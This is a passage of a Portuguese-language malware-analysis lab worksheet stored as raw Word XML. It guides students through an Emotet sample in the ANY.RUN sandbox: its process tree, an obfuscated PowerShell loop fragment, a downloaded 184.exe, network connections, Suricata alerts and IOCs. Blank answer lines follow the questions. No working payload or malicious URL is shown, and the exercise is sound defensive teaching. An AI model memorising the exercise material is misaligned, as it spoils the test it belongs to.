      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve"> na linha 2?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F0BC4B" w14:textId="780D6BEF" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C" w:rsidP="00CA6456">
      <w:pPr>
        <w:pStyle w:val="AnswerLineL50"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>Digite suas respostas aqui.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56746B67" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="BodyTextL50"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>Retorne para o ANY.RUN. Qual é o próximo processo abaixo do PowerShell?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52074D39" w14:textId="611B86C0" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C" w:rsidP="00CA6456">
      <w:pPr>
        <w:pStyle w:val="AnswerLineL50"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>Digite suas respostas aqui.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2A6ACE" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:rStyle w:val="BodyTextL50Char"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>c.</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:rStyle w:val="BodyTextL50Char"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">Veja a linha 14. O comando é </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:rStyle w:val="CMDChar"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>foreach</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>($j5YzrQKQ in $NUzAMAR</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:rStyle w:val="BodyTextL50Char"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:rStyle w:val="BodyTextL50Char"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F505EA4" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:rStyle w:val="BodyTextL50Char"/>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>Pergunta:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="294B9285" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="BodyTextL50"/>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:rStyle w:val="BodyTextL50Char"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>Qual é</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:rStyle w:val="BodyTextL25Char"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve"> o conteúdo da variável $NUzAMAR conforme atribuído nas linhas 8 - 11?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76895432" w14:textId="554F5FD0" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C" w:rsidP="00CA6456">
      <w:pPr>
        <w:pStyle w:val="AnswerLineL50"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>Digite suas respostas aqui.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D6FF243" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">em seguida, executa o arquivo baixado 184.exe. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AAD9DA1" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>Etapa 6: Exibir detalhes de conexões de malware e ameaças conhecidas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1184E030" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>a.</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>Abaixo da visualização da área de trabalho, há uma série de guias que fornecem detalhes do comportamento do malware. A primeira guia mostra o comportamento da rede e as ameaças conhecidas. Clique na guia Solicitações HTTP. Ele mostra os processos que tentaram fazer conexões por HTTP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31995BD8" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="BodyTextL50"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>Observação</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>: embora você esteja trabalhando em uma VM, não é recomendável tentar se conectar a qualquer uma dessas URLs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63652F1B" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Perguntas:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BCCFD25" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="BodyTextL50"/>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">Com qual URL o powershell.exe se conectou com sucesso? Isso corresponderá a uma das URLs na pasta </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B126A6" w14:textId="35F29727" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C" w:rsidP="00CA6456">
      <w:pPr>
        <w:pStyle w:val="AnswerLineL50"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>Digite suas respostas aqui.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22249303" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="BodyTextL50"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>Que processo começa então a emitir solicitações para a Web?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F83BD12" w14:textId="369D793A" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C" w:rsidP="00CA6456">
      <w:pPr>
        <w:pStyle w:val="AnswerLineL50"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>Digite suas respostas aqui.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF939DF" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="BodyTextL50"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>O novo processo tenta se comunicar com uma série de URLs. De qual URL o processo baixa arquivos binários?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C7E47A" w14:textId="5240798A" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C" w:rsidP="00CA6456">
      <w:pPr>
        <w:pStyle w:val="AnswerLineL50"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>Digite suas respostas aqui.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2494DAAA" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>b.</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">Clique na guia </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>Conexões</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">. Aqui você pode ver um cronograma das conexões que foram feitas durante a exploração do malware. Na guia </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>DNS</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>, é possível ver as solicitações de DNS feitas pelo malware. Observe que você pode baixar PCAPs para conexões e solicitações de DNS. Esses arquivos podem ser abertos no Wireshark para posterior análise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D957B07" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>c.</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">Clique na guia </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>Ameaças</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve"> Aqui você verá mensagens de alerta IPS da Suricata chamadas identificadores de assinatura (SID). Esses alertas são acionados por vários comportamentos de malware, conforme detectado pelas regras de IDS / IPS. Essas mensagens são usadas por várias plataformas de monitoramento de segurança de rede. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A9DC27D" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">Parte 3: Investigar um Exploit </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="413B147F" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="BodyTextL25"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>Investigamos várias características dessa exploração, mas não aprendemos muito sobre a exploração em si. ANY.RUN mantém uma enciclopédia de malware chamada Tracker. Se existir um artigo do Rastreador para a amostra de malware, ANY.RUN está vinculado ao artigo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="128E12DF" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="BodyTextL25"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>Observação</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>: talvez seja necessário se registrar em uma conta no Any.Run para visualizar alguns dos recursos abordados nesta parte.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F76BA78" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>a.</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>No painel à direita, na interface, há um cabeçalho que fornece informações sobre o malware, incluindo o hash MD5 do arquivo, o tempo necessário para executar a exploração na sandbox e uma série de tags. Se você clicar em uma marca, será direcionado para uma pesquisa de tarefas que listará todas as explorações enviadas que compartilham essa marca.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38DC760B" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>b.</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>Sob as tags estão vários botões. Clique em IOC para ver todos os IOCs do malware enviado. Esses IOCs são diagnósticos para a exploração. Encontrar qualquer um deles nos dados de monitoramento de rede pode indicar uma exploração.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA965ED" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>c.</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>Por fim, abaixo das tags, há um link para o Tracker. Conforme indicado, a exploração de malware é conhecida e o Emotet. Clique no link para ler sobre o Emotet e responder às perguntas abaixo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B81E73" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>Perguntas:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7774E43C" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="BodyTextL50"/>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>Que tipo de malware é o Emotet e quais são suas principais funções?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6982B430" w14:textId="0E838A50" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C" w:rsidP="00CA6456">
      <w:pPr>
        <w:pStyle w:val="AnswerLineL50"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>Digite suas respostas aqui.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5647962A" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="BodyTextL50"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>O Emotet exibe polimorfismo. O que isso quer dizer?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ACC03E0" w14:textId="675DD71B" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C" w:rsidP="00CA6456">
      <w:pPr>
        <w:pStyle w:val="AnswerLineL50"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>Digite suas respostas aqui.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FBD793A" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="BodyTextL50"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>Qual é o vetor de ataque que espalhou o malware para as possíveis vítimas?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C9C22E" w14:textId="161221EB" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C" w:rsidP="00CA6456">
      <w:pPr>
        <w:pStyle w:val="AnswerLineL50"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C7266A">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>Digite suas respostas aqui.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E2B266C" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="BodyTextL50"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>O que os usuários devem saber para não infectar seus computadores (e outros hosts na rede) com o Emotet?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1226F30B" w14:textId="706B44A9" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C" w:rsidP="00CA6456">
      <w:pPr>
        <w:pStyle w:val="AnswerLineL50"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>Digite suas respostas aqui.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B46AD48" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>d.</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">Volte à página de análise da variante de malware Emotet com a qual temos trabalhado. Abaixo do nome do arquivo de malware, você verá uma série de marcas. Clique na tag </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>Emotet</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">. Isso executará uma pesquisa por outro malware que tenha sido identificado como Emotet. Clique em vários relatórios de </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>envio público até encontrar vários que parecem ter sido executados com sucesso na sandbox. Você deverá ver várias solicitações de HTTP que ocorreram durante o processo de infecção.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61729D83" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
